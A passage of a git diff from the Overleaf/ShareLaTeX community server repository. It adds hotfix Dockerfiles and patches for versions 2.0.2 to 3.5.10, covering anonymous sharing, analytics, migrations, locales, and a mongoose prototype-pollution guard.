(Settings.allowAnonymousReadAndWriteSharing) { ++ webRouter.post( ++ fileUploadEndpoint, ++ fileUploadRateLimit, ++ AuthorizationMiddleware.ensureUserCanWriteProjectContent, ++ ProjectUploadController.multerMiddleware, ++ ProjectUploadController.uploadFile ++ ) ++ } else { ++ webRouter.post( ++ fileUploadEndpoint, ++ fileUploadRateLimit, ++ AuthenticationController.requireLogin(), ++ AuthorizationMiddleware.ensureUserCanWriteProjectContent, ++ ProjectUploadController.multerMiddleware, ++ ProjectUploadController.uploadFile ++ ) ++ } + } + } diff --git a/server-ce/hotfix/2.0.2/2-read-only-access.patch b/server-ce/hotfix/2.0.2/2-read-only-access.patch new file mode 100644 index 0000000..246cc3e --- /dev/null +++ b/server-ce/hotfix/2.0.2/2-read-only-access.patch @@ -0,0 +1,11 @@ +--- TokenAccessHandler.js ++++ TokenAccessHandler.js +@@ -255,7 +255,7 @@ const TokenAccessHandler = { + + getV1DocPublishedInfo(token, callback) { + // default to allowing access +- if (!Settings.apis || !Settings.apis.v1) { ++ if (!Settings.apis.v1 || !Settings.apis.v1.url) { + return callback(null, { allow: true }) + } + V1Api.request( diff --git a/server-ce/hotfix/2.0.2/3-url-linking-1.patch b/server-ce/hotfix/2.0.2/3-url-linking-1.patch new file mode 100644 index 0000000..1738098 --- /dev/null +++ b/server-ce/hotfix/2.0.2/3-url-linking-1.patch @@ -0,0 +1,11 @@ +--- Features.js ++++ Features.js +@@ -53,6 +53,8 @@ module.exports = Features = { + return Settings.apis.references.url != null + case 'saml': + return Settings.enableSaml ++ case 'link-url': ++ return Settings.apis.linkedUrlProxy && Settings.apis.linkedUrlProxy.url + default: + throw new Error(`unknown feature: ${feature}`) + } diff --git a/server-ce/hotfix/2.0.2/4-url-linking-2.patch b/server-ce/hotfix/2.0.2/4-url-linking-2.patch new file mode 100644 index 0000000..587a8e6 --- /dev/null +++ b/server-ce/hotfix/2.0.2/4-url-linking-2.patch @@ -0,0 +1,20 @@ +--- new-file-modal.pug ++++ new-file-modal.pug +@@ -21,11 +21,12 @@ script(type='text/ng-template', id='newFileModalTemplate') + i.fa.fa-fw.fa-folder-open + | + | From Another Project +- li(ng-class="type == 'url' ? 'active' : null") +- a(href, ng-click="type = 'url'") +- i.fa.fa-fw.fa-globe +- | +- | From External URL ++ if hasFeature('link-url') ++ li(ng-class="type == 'url' ? 'active' : null") ++ a(href, ng-click="type = 'url'") ++ i.fa.fa-fw.fa-globe ++ | ++ | From External URL + != moduleIncludes("newFileModal:selector", locals) + + td(class="modal-new-file--body modal-new-file--body-{{type}}") diff --git a/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch b/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch new file mode 100644 index 0000000..198ee03 --- /dev/null +++ b/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch @@ -0,0 +1,26 @@ +--- AnalyticsController.js ++++ AnalyticsController.js +@@ -3,9 +3,13 @@ const Errors = require('../Errors/Errors') + const AuthenticationController = require('../Authentication/AuthenticationController') + const InstitutionsAPI = require('../Institutions/InstitutionsAPI') + const GeoIpLookup = require('../../infrastructure/GeoIpLookup') ++const Features = require('../../infrastructure/Features') + + module.exports = { + updateEditingSession(req, res, next) { ++ if (!Features.hasFeature('analytics')) { ++ return res.send(204) ++ } + const userId = AuthenticationController.getLoggedInUserId(req) + const { projectId } = req.params + let countryCode = null +@@ -28,6 +32,9 @@ module.exports = { + }, + + recordEvent(req, res, next) { ++ if (!Features.hasFeature('analytics')) { ++ return res.send(204) ++ } + const userId = + AuthenticationController.getLoggedInUserId(req) || req.sessionID + AnalyticsManager.recordEvent(userId, req.params.event, req.body, error => diff --git a/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch b/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch new file mode 100644 index 0000000..9fb41c1 --- /dev/null +++ b/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch @@ -0,0 +1,10 @@ +--- Features.js ++++ Features.js +@@ -41,6 +41,7 @@ module.exports = Features = { + case 'templates-server-pro': + return Settings.overleaf == null + case 'affiliations': ++ case 'analytics': + // Checking both properties is needed for the time being to allow + // enabling the feature in web-api and disabling in Server Pro + // see https://github.com/overleaf/web-internal/pull/2127 diff --git a/server-ce/hotfix/2.0.2/Dockerfile b/server-ce/hotfix/2.0.2/Dockerfile new file mode 100644 index 0000000..7a75ed9 --- /dev/null +++ b/server-ce/hotfix/2.0.2/Dockerfile @@ -0,0 +1,31 @@ +FROM sharelatex/sharelatex:2.0.1 + + +# Patch 1: Fixes anonymous link sharing +ADD 1-anon-upload.patch /var/www/sharelatex/web/app/src/Features/Uploads/1-anon-upload.patch +RUN cd /var/www/sharelatex/web/app/src/Features/Uploads/ && \ + patch < 1-anon-upload.patch + + +# Patch 2: Fixes read-only access +ADD 2-read-only-access.patch /var/www/sharelatex/web/app/src/Features/TokenAccess/3-read-only-access.patch +RUN cd /var/www/sharelatex/web/app/src/Features/TokenAccess/ && \ + patch < 3-read-only-access.patch + + +# Patch 3: Fixes url linking +ADD 3-url-linking-1.patch /var/www/sharelatex/web/app/src/infrastructure/6-url-linking-1.patch +RUN cd /var/www/sharelatex/web/app/src/infrastructure/ && \ + patch < 6-url-linking-1.patch +ADD 4-url-linking-2.patch /var/www/sharelatex/web/app/views/project/editor/7-url-linking-2.patch +RUN cd /var/www/sharelatex/web/app/views/project/editor/ && \ + patch < 7-url-linking-2.patch + + +# Patch 4: Disables analytics +ADD 5-disable-analytics-1.patch /var/www/sharelatex/web/app/src/Features/Analytics/8-disable-analytics-1.patch +RUN cd /var/www/sharelatex/web/app/src/Features/Analytics/ && \ + patch < 8-disable-analytics-1.patch +ADD 6-disable-analytics-2.patch /var/www/sharelatex/web/app/src/infrastructure/9-disable-analytics-2.patch +RUN cd /var/www/sharelatex/web/app/src/infrastructure/ && \ + patch < 9-disable-analytics-2.patch diff --git a/server-ce/hotfix/2.1.1/Dockerfile b/server-ce/hotfix/2.1.1/Dockerfile new file mode 100644 index 0000000..313c596 --- /dev/null +++ b/server-ce/hotfix/2.1.1/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:2.1.0 + +# Patch: defines recaptcha config to fix share-related issues +# - https://github.com/overleaf/overleaf/issues/684 +ADD add-recaptcha-config.patch /etc/sharelatex/add-recaptcha-config.patch +RUN cd /etc/sharelatex/ && \ + patch < add-recaptcha-config.patch + diff --git a/server-ce/hotfix/2.1.1/add-recaptcha-config.patch b/server-ce/hotfix/2.1.1/add-recaptcha-config.patch new file mode 100644 index 0000000..cdca537 --- /dev/null +++ b/server-ce/hotfix/2.1.1/add-recaptcha-config.patch @@ -0,0 +1,14 @@ +--- a/settings.coffee ++++ b/settings.coffee +@@ -180,6 +180,11 @@ settings = + # cookie with a secure flag (recommended). + secureCookie: process.env["SHARELATEX_SECURE_COOKIE"]? + ++ recaptcha: ++ disabled: ++ invite: true ++ register: true ++ + # If you are running ShareLaTeX behind a proxy (like Apache, Nginx, etc) + # then set this to true to allow it to correctly detect the forwarded IP + # address and http/https protocol information. diff --git a/server-ce/hotfix/2.3.1/Dockerfile b/server-ce/hotfix/2.3.1/Dockerfile new file mode 100644 index 0000000..36f136a --- /dev/null +++ b/server-ce/hotfix/2.3.1/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:2.3.0 + + +# Patch: Fixes NPE when invoking synctex (https://github.com/overleaf/overleaf/issues/756) +ADD check-clsi-setting-exists.patch /var/www/sharelatex/clsi/app/js/check-clsi-setting-exists.patch +RUN cd /var/www/sharelatex/clsi/app/js && \ + patch < check-clsi-setting-exists.patch diff --git a/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch b/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch new file mode 100644 index 0000000..6f6535b --- /dev/null +++ b/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch @@ -0,0 +1,11 @@ +--- a/app/js/CompileManager.js ++++ b/app/js/CompileManager.js +@@ -536,7 +536,7 @@ module.exports = CompileManager = { + compileName, + command, + directory, +- Settings.clsi != null ? Settings.clsi.docker.image : undefined, ++ Settings.clsi && Settings.clsi.docker ? Settings.clsi.docker.image : undefined, + timeout, + {}, + function(error, output) { diff --git a/server-ce/hotfix/2.4.1/Dockerfile b/server-ce/hotfix/2.4.1/Dockerfile new file mode 100644 index 0000000..d765551 --- /dev/null +++ b/server-ce/hotfix/2.4.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:2.4.0 + + +# Patch: Fixes missing dependencies on web startup (https://github.com/overleaf/overleaf/issues/767) +RUN cd /var/www/sharelatex/web && \ + npm install i18next@^19.6.3 i18next-fs-backend@^1.0.7 i18next-http-middleware@^3.0.2 diff --git a/server-ce/hotfix/2.4.2/Dockerfile b/server-ce/hotfix/2.4.2/Dockerfile new file mode 100644 index 0000000..640eea7 --- /dev/null +++ b/server-ce/hotfix/2.4.2/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:2.4.1 + + +# Patch: Fixes anonymous read/write sharing +COPY anonymous-metadata.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < anonymous-metadata.patch + +# Patch: Fixes left footer with html text +COPY left-footer-skip-translation.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < left-footer-skip-translation.patch diff --git a/server-ce/hotfix/2.4.2/anonymous-metadata.patch b/server-ce/hotfix/2.4.2/anonymous-metadata.patch new file mode 100644 index 0000000..ea041ab --- /dev/null +++ b/server-ce/hotfix/2.4.2/anonymous-metadata.patch @@ -0,0 +1,43 @@ +--- /var/www/sharelatex/web/app/src/router.js 2020-09-14 20:21:39.741433000 +0000 ++++ /var/www/sharelatex/web/app/src/router.js 2020-09-14 20:13:08.000000000 +0000 +@@ -607,16 +607,17 @@ + ProjectDownloadsController.downloadMultipleProjects + ) + ++ console.log(`allowAnonymousReadAndWriteSharing: ${Settings.allowAnonymousReadAndWriteSharing}`) + webRouter.get( + '/project/:project_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? (req, res, next) => { next() } : AuthenticationController.requireLogin(), + MetaController.getMetadata +- ) ++ ) + webRouter.post( + '/project/:project_id/doc/:doc_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? (req, res, next) => { next() } : AuthenticationController.requireLogin(), + MetaController.broadcastMetadataForDoc + ) + privateApiRouter.post( +--- /var/www/sharelatex/web/app/src/Features/Contacts/ContactRouter.js 2020-09-14 20:21:52.243779000 +0000 ++++ /var/www/sharelatex/web/app/src/Features/Contacts/ContactRouter.js 2020-09-14 20:13:08.000000000 +0000 +@@ -5,6 +5,8 @@ + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ ++const Settings = require('settings-sharelatex') ++ + const AuthenticationController = require('../Authentication/AuthenticationController') + const ContactController = require('./ContactController') + +@@ -12,7 +14,7 @@ + apply(webRouter, apiRouter) { + return webRouter.get( + '/user/contacts', +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? (req, res, next) => { next() } : AuthenticationController.requireLogin(), + ContactController.getContacts + ) + } diff --git a/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch b/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch new file mode 100644 index 0000000..ee6e33a --- /dev/null +++ b/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch @@ -0,0 +1,12 @@ + +--- /var/www/sharelatex/web/app/views/layout/footer.pug ++++ /var/www/sharelatex/web/app/app/views/layout/footer.pug +@@ -32,7 +32,7 @@ footer.site-footer + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else +- | !{translate(item.text)} ++ | !{item.text} + + ul.col-md-3.text-right + diff --git a/server-ce/hotfix/2.5.1/Dockerfile b/server-ce/hotfix/2.5.1/Dockerfile new file mode 100644 index 0000000..d22f912 --- /dev/null +++ b/server-ce/hotfix/2.5.1/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:2.5.0 + +# Patch #826: Fixes log path for contacts service to be picked up by logrotate +COPY contacts-run.patch /etc/service/contacts-sharelatex +RUN cd /etc/service/contacts-sharelatex && patch < contacts-run.patch + +# Patch #826: delete old logs for the contacts service +COPY delete-old-logs.patch /etc/my_init.d +RUN cd /etc/my_init.d && patch < delete-old-logs.patch \ +&& chmod +x /etc/my_init.d/10_delete_old_logs.sh + +# Patch #827: fix logrotate file permissions +RUN chmod 644 /etc/logrotate.d/sharelatex diff --git a/server-ce/hotfix/2.5.1/contacts-run.patch b/server-ce/hotfix/2.5.1/contacts-run.patch new file mode 100644 index 0000000..81ef36e --- /dev/null +++ b/server-ce/hotfix/2.5.1/contacts-run.patch @@ -0,0 +1,8 @@ +--- a/run ++++ b/run +@@ -7,4 +7,4 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + +-exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /var/www/sharelatex/contacts/app.js >> /var/log/sharelatex/contacts 2>&1 ++exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /var/www/sharelatex/contacts/app.js >> /var/log/sharelatex/contacts.log 2>&1 diff --git a/server-ce/hotfix/2.5.1/delete-old-logs.patch b/server-ce/hotfix/2.5.1/delete-old-logs.patch new file mode 100644 index 0000000..bc2be14 --- /dev/null +++ b/server-ce/hotfix/2.5.1/delete-old-logs.patch @@ -0,0 +1,10 @@ +--- /dev/null ++++ b/10_delete_old_logs.sh +@@ -0,0 +1,7 @@ ++#!/bin/sh ++set -e ++ ++# Up to version 2.5.0 the logs of the contacts service were written into a ++# file that was not picked up by logrotate. ++# The service is stable and we can safely discard any logs. ++rm -vf /var/log/sharelatex/contacts diff --git a/server-ce/hotfix/2.5.2/12_update_token_email.js b/server-ce/hotfix/2.5.2/12_update_token_email.js new file mode 100644 index 0000000..5ac870b --- /dev/null +++ b/server-ce/hotfix/2.5.2/12_update_token_email.js @@ -0,0 +1,29 @@ +const Settings = require('settings-sharelatex') +const mongojs = require('mongojs') +const db = mongojs(Settings.mongo.url, ['tokens']) +// eslint-disable-next-line import/no-extraneous-dependencies +const async = require('async') + +exports.migrate = (client, done) => { + console.log(`>> Updating 'data.email' to lower case in tokens`) + + db.tokens.find({}, { 'data.email': 1 }, (err, tokens) => { + if (err) { + return done(err) + } + + async.eachSeries( + tokens, + (token, callback) => { + db.tokens.update( + { _id: token._id }, + { $set: { 'data.email': token.data.email.toLowerCase() } }, + callback + ) + }, + done + ) + }) +} + +exports.rollback = (client, done) => done() diff --git a/server-ce/hotfix/2.5.2/Dockerfile b/server-ce/hotfix/2.5.2/Dockerfile new file mode 100644 index 0000000..ddf596d --- /dev/null +++ b/server-ce/hotfix/2.5.2/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:2.5.1 + +# Patch: fixes registration token creation +COPY create-token-lowercase-email.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < create-token-lowercase-email.patch + +# Migration for tokens with invalid email addresses +ADD 12_update_token_email.js /var/www/sharelatex/migrations/12_update_token_email.js diff --git a/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch b/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch new file mode 100644 index 0000000..23dfaa3 --- /dev/null +++ b/server-ce/hotfix/2.5.2/create-token-lowercase-email.patch @@ -0,0 +1,11 @@ +--- /var/www/sharelatex/web/app/src/Features/User/UserRegistrationHandler.js ++++ /var/www/sharelatex/web/app/src/Features/User/UserRegistrationHandler.js +@@ -122,7 +122,7 @@ const UserRegistrationHandler = { + const ONE_WEEK = 7 * 24 * 60 * 60 // seconds + OneTimeTokenHandler.getNewToken( + 'password', +- { user_id: user._id.toString(), email }, ++ { user_id: user._id.toString(), email: user.email }, + { expiresIn: ONE_WEEK }, + (err, token) => { + if (err != null) { diff --git a/server-ce/hotfix/2.6.1/Dockerfile b/server-ce/hotfix/2.6.1/Dockerfile new file mode 100644 index 0000000..6df467b --- /dev/null +++ b/server-ce/hotfix/2.6.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.6.0-RC1 + +# Patch: fixes Project restore inserts bad projectId into deletedFiles +COPY document-deleter-object-id.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < document-deleter-object-id.patch diff --git a/server-ce/hotfix/2.6.1/document-deleter-object-id.patch b/server-ce/hotfix/2.6.1/document-deleter-object-id.patch new file mode 100644 index 0000000..a92ce49 --- /dev/null +++ b/server-ce/hotfix/2.6.1/document-deleter-object-id.patch @@ -0,0 +1,10 @@ +--- /var/www/sharelatex/web/app/src/Features/Project/ProjectDeleter.js ++++ /var/www/sharelatex/web/app/src/Features/Project/ProjectDeleter.js +@@ -278,6 +278,7 @@ async function deleteProject(projectId, options = {}) { + } + + async function undeleteProject(projectId, options = {}) { ++ projectId = ObjectId(projectId) + let deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId + }).exec() diff --git a/server-ce/hotfix/2.6.2/Dockerfile b/server-ce/hotfix/2.6.2/Dockerfile new file mode 100644 index 0000000..2df3651 --- /dev/null +++ b/server-ce/hotfix/2.6.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.6.1 + +# Patch: fixes overleaf.com onboarding email being sent in CE/SP +COPY onboarding-email.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < onboarding-email.patch diff --git a/server-ce/hotfix/2.6.2/onboarding-email.patch b/server-ce/hotfix/2.6.2/onboarding-email.patch new file mode 100644 index 0000000..2d1fed5 --- /dev/null +++ b/server-ce/hotfix/2.6.2/onboarding-email.patch @@ -0,0 +1,25 @@ +--- /var/www/sharelatex/web/app/src/Features/User/UserCreator.js ++++ /var/www/sharelatex/web/app/src/Features/User/UserCreator.js +@@ -85,13 +85,15 @@ async function createNewUser(attributes, options = {}) { + } + + Analytics.recordEvent(user._id, 'user-registered') +- try { +- await UserOnboardingEmailQueueManager.scheduleOnboardingEmail(user) +- } catch (error) { +- logger.error( +- `Failed to schedule sending of onboarding email for user '${user._id}'`, +- error +- ) ++ if(Features.hasFeature('saas')) { ++ try { ++ await UserOnboardingEmailQueueManager.scheduleOnboardingEmail(user) ++ } catch (error) { ++ logger.error( ++ `Failed to schedule sending of onboarding email for user '${user._id}'`, ++ error ++ ) ++ } + } + + return user diff --git a/server-ce/hotfix/2.7.1/Dockerfile b/server-ce/hotfix/2.7.1/Dockerfile new file mode 100644 index 0000000..5d7cb3e --- /dev/null +++ b/server-ce/hotfix/2.7.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:2.7.0 + +# Patch: fixes overleaf.com onboarding email being sent in CE/SP +COPY remove-disconnect-endpoint.patch . +RUN patch -p0 < remove-disconnect-endpoint.patch diff --git a/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch b/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch new file mode 100644 index 0000000..c1328a2 --- /dev/null +++ b/server-ce/hotfix/2.7.1/remove-disconnect-endpoint.patch @@ -0,0 +1,14 @@ +--- /var/www/sharelatex/web/app/src/router.js +--- /var/www/sharelatex/web/app/src/router.js +@@ -995,11 +995,6 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + AdminController.unregisterServiceWorker + ) + +- privateApiRouter.post( +- '/disconnectAllUsers', +- AdminController.disconnectAllUsers +- ) +- + privateApiRouter.get('/perfTest', (req, res) => res.send('hello')) + + publicApiRouter.get('/status', (req, res) => { diff --git a/server-ce/hotfix/3.0.1/Dockerfile b/server-ce/hotfix/3.0.1/Dockerfile new file mode 100644 index 0000000..3db2819 --- /dev/null +++ b/server-ce/hotfix/3.0.1/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.0.0 + +# Patch: fixes overleaf.com onboarding email being sent in CE/SP +COPY remove-disconnect-endpoint.patch . +RUN patch -p0 < remove-disconnect-endpoint.patch diff --git a/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch b/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch new file mode 100644 index 0000000..c1328a2 --- /dev/null +++ b/server-ce/hotfix/3.0.1/remove-disconnect-endpoint.patch @@ -0,0 +1,14 @@ +--- /var/www/sharelatex/web/app/src/router.js +--- /var/www/sharelatex/web/app/src/router.js +@@ -995,11 +995,6 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + AdminController.unregisterServiceWorker + ) + +- privateApiRouter.post( +- '/disconnectAllUsers', +- AdminController.disconnectAllUsers +- ) +- + privateApiRouter.get('/perfTest', (req, res) => res.send('hello')) + + publicApiRouter.get('/status', (req, res) => { diff --git a/server-ce/hotfix/3.1.1/Dockerfile b/server-ce/hotfix/3.1.1/Dockerfile new file mode 100644 index 0000000..b0b5b6f --- /dev/null +++ b/server-ce/hotfix/3.1.1/Dockerfile @@ -0,0 +1,11 @@ +FROM sharelatex/sharelatex:3.1.0 + +# Patch: fixes Sharelatex History navigation +# https://github.com/overleaf/overleaf/issues/1035 +COPY fix-history-navigation.patch . +RUN patch -p0 < fix-history-navigation.patch + + +# Rebuild client +# -------------- +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.1.1/fix-history-navigation.patch b/server-ce/hotfix/3.1.1/fix-history-navigation.patch new file mode 100644 index 0000000..0033abf --- /dev/null +++ b/server-ce/hotfix/3.1.1/fix-history-navigation.patch @@ -0,0 +1,16 @@ +--- services/web/frontend/js/ide/history/controllers/HistoryListController.js ++++ services/web/frontend/js/ide/history/controllers/HistoryListController.js +@@ -62,7 +62,12 @@ App.controller('HistoryListController', function ($scope, $modal, ide) { + return (() => { + const result = [] + for (const update of Array.from($scope.history.updates)) { +- let inSelection ++ ++ // replacing this declaration with `let` introduces a bug in history point selection: ++ // https://github.com/overleaf/overleaf/issues/1035 ++ // eslint-disable-next-line no-var ++ var inSelection ++ + if (update.selectedTo) { + inSelection = true + beforeSelection = false \ No newline at end of file diff --git a/server-ce/hotfix/3.2.1/Dockerfile b/server-ce/hotfix/3.2.1/Dockerfile new file mode 100644 index 0000000..766eefa --- /dev/null +++ b/server-ce/hotfix/3.2.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:3.2.0 + +# Patch: fixes source editor broken +# https://github.com/overleaf/overleaf/issues/1043 +COPY disable-codemirror.patch . +RUN patch -p0 < disable-codemirror.patch diff --git a/server-ce/hotfix/3.2.1/disable-codemirror.patch b/server-ce/hotfix/3.2.1/disable-codemirror.patch new file mode 100644 index 0000000..139fa90 --- /dev/null +++ b/server-ce/hotfix/3.2.1/disable-codemirror.patch @@ -0,0 +1,15 @@ +--- services/web/app/src/Features/Project/ProjectController.js +--- services/web/app/src/Features/Project/ProjectController.js +@@ -1134,11 +1134,7 @@ const ProjectController = { + detachRole = req.params.detachRole + } + +- const showNewSourceEditorOption = +- (newSourceEditorAssignment && +- newSourceEditorAssignment.variant === 'codemirror') || +- user.betaProgram || +- shouldDisplayFeature('new_source_editor', false) // also allow override via ?new_source_editor=true ++ const showNewSourceEditorOption = false // disabled in CE/SP (Hotfix 3.2.1) + + const showSymbolPalette = + !Features.hasFeature('saas') || diff --git a/server-ce/hotfix/3.2.2/Dockerfile b/server-ce/hotfix/3.2.2/Dockerfile new file mode 100644 index 0000000..e4b04cf --- /dev/null +++ b/server-ce/hotfix/3.2.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.2.1 + +# Fixes compilation errors in embedded compiles +# https://github.com/overleaf/overleaf/issues/1044 +ENV PATH="${PATH}:/usr/local/texlive/2022/bin/x86_64-linux" diff --git a/server-ce/hotfix/3.3.2/Dockerfile b/server-ce/hotfix/3.3.2/Dockerfile new file mode 100644 index 0000000..6cfe14f --- /dev/null +++ b/server-ce/hotfix/3.3.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.3.0 + +# Patch: add migration for convert_archived_state script +COPY pr_10442.patch . +RUN patch -p0 < pr_10442.patch diff --git a/server-ce/hotfix/3.3.2/pr_10442.patch b/server-ce/hotfix/3.3.2/pr_10442.patch new file mode 100644 index 0000000..6f5353d --- /dev/null +++ b/server-ce/hotfix/3.3.2/pr_10442.patch @@ -0,0 +1,132 @@ +--- services/web/scripts/convert_archived_state.js ++++ services/web/scripts/convert_archived_state.js +@@ -6,62 +6,77 @@ + const { promiseMapWithLimit } = require('../app/src/util/promises') + + // $ node scripts/convert_archived_state.js FIRST,SECOND +-const STAGE = process.argv.pop() + +-async function main() { +- if (STAGE.includes('FIRST')) { +- await batchedUpdate( +- 'projects', +- { archived: false }, +- { +- $set: { archived: [] }, +- } +- ) ++async function main(STAGE) { ++ for (const FIELD of ['archived', 'trashed']) { ++ if (STAGE.includes('FIRST')) { ++ await batchedUpdate( ++ 'projects', ++ { [FIELD]: false }, ++ { ++ $set: { [FIELD]: [] }, ++ } ++ ) + +- console.error('Done, with first part') +- } ++ console.error('Done, with first part for field:', FIELD) ++ } + +- if (STAGE.includes('SECOND')) { +- await batchedUpdate('projects', { archived: true }, performUpdate, { +- _id: 1, +- owner_ref: 1, +- collaberator_refs: 1, +- readOnly_refs: 1, +- tokenAccessReadAndWrite_refs: 1, +- tokenAccessReadOnly_refs: 1, +- }) ++ if (STAGE.includes('SECOND')) { ++ await batchedUpdate( ++ 'projects', ++ { [FIELD]: true }, ++ async function performUpdate(collection, nextBatch) { ++ await promiseMapWithLimit( ++ WRITE_CONCURRENCY, ++ nextBatch, ++ async project => { ++ try { ++ await upgradeFieldToArray({ collection, project, FIELD }) ++ } catch (err) { ++ console.error(project._id, err) ++ throw err ++ } ++ } ++ ) ++ }, ++ { ++ _id: 1, ++ owner_ref: 1, ++ collaberator_refs: 1, ++ readOnly_refs: 1, ++ tokenAccessReadAndWrite_refs: 1, ++ tokenAccessReadOnly_refs: 1, ++ } ++ ) + +- console.error('Done, with second part') ++ console.error('Done, with second part for field:', FIELD) ++ } + } + } + +-main() +- .then(() => { +- process.exit(0) +- }) +- .catch(error => { +- console.error({ error }) +- process.exit(1) +- }) +- +-async function performUpdate(collection, nextBatch) { +- await promiseMapWithLimit(WRITE_CONCURRENCY, nextBatch, project => +- setArchived(collection, project) +- ) ++module.exports = main ++ ++if (require.main === module) { ++ main(process.argv.pop()) ++ .then(() => { ++ process.exit(0) ++ }) ++ .catch(error => { ++ console.error({ error }) ++ process.exit(1) ++ }) + } + +-async function setArchived(collection, project) { +- const archived = calculateArchivedArray(project) +- ++async function upgradeFieldToArray({ collection, project, FIELD }) { + return collection.updateOne( + { _id: project._id }, + { +- $set: { archived }, ++ $set: { [FIELD]: getAllUserIds(project) }, + } + ) + } + +-function calculateArchivedArray(project) { ++function getAllUserIds(project) { + return _.unionWith( + [project.owner_ref], + project.collaberator_refs, +--- /dev/null ++++ services/web/migrations/20221111111111_ce_sp_convert_archived_state.js +@@ -0,0 +1,9 @@ ++const runScript = require('../scripts/convert_archived_state') ++ ++exports.tags = ['server-ce', 'server-pro'] ++ ++exports.migrate = async () => { ++ await runScript('FIRST,SECOND') ++} ++ ++exports.rollback = async () => {} diff --git a/server-ce/hotfix/3.5.1/Dockerfile b/server-ce/hotfix/3.5.1/Dockerfile new file mode 100644 index 0000000..cd10840 --- /dev/null +++ b/server-ce/hotfix/3.5.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:3.5.0 + +# Patch: fix German locales +COPY fix_de_locales.patch . +RUN patch -p0 < fix_de_locales.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.5.1/fix_de_locales.patch b/server-ce/hotfix/3.5.1/fix_de_locales.patch new file mode 100644 index 0000000..54ed1f1 --- /dev/null +++ b/server-ce/hotfix/3.5.1/fix_de_locales.patch @@ -0,0 +1,10 @@ +--- services/web/locales/de.json ++++ services/web/locales/de.json +@@ -348,7 +348,6 @@ + "edit_dictionary_empty": "Dein benutzerdefiniertes Wörterbuch ist leer.", + "edit_dictionary_remove": "Aus Wörterbuch entfernen", + "editing": "Bearbeitung", +- "editor_and_pdf": "Editor & PDF", + "editor_disconected_click_to_reconnect": "Editor wurde getrennt", + "editor_only_hide_pdf": "Nur Editor <0>(PDF ausblenden)", + "editor_resources": "Editor-Literatur", diff --git a/server-ce/hotfix/3.5.10/Dockerfile b/server-ce/hotfix/3.5.10/Dockerfile new file mode 100644 index 0000000..ae09f89 --- /dev/null +++ b/server-ce/hotfix/3.5.10/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:3.5.9 + +# Patch: clear invite and invite tokens through the websocket +COPY pr_13427.patch . +RUN patch -p0 < pr_13427.patch + +# Patch: https://github.com/Automattic/mongoose/commit/f1efabf350522257364aa5c2cb36e441cf08f1a2 +COPY mongoose_proto.patch . +RUN patch -p0 < mongoose_proto.patch diff --git a/server-ce/hotfix/3.5.10/mongoose_proto.patch b/server-ce/hotfix/3.5.10/mongoose_proto.patch new file mode 100644 index 0000000..37559db --- /dev/null +++ b/server-ce/hotfix/3.5.10/mongoose_proto.patch @@ -0,0 +1,12 @@ +--- node_modules/mongoose/lib/document.js ++++ node_modules/mongoose/lib/document.js +@@ -689,6 +689,10 @@ function init(self, obj, doc, opts, prefix) { + + function _init(index) { + i = keys[index]; ++ // avoid prototype pollution ++ if (i === '__proto__' || i === 'constructor') { ++ return; ++ } + path = prefix + i; + schema = self.$__schema.path(path); diff --git a/server-ce/hotfix/3.5.10/pr_13427.patch b/server-ce/hotfix/3.5.10/pr_13427.patch new file mode 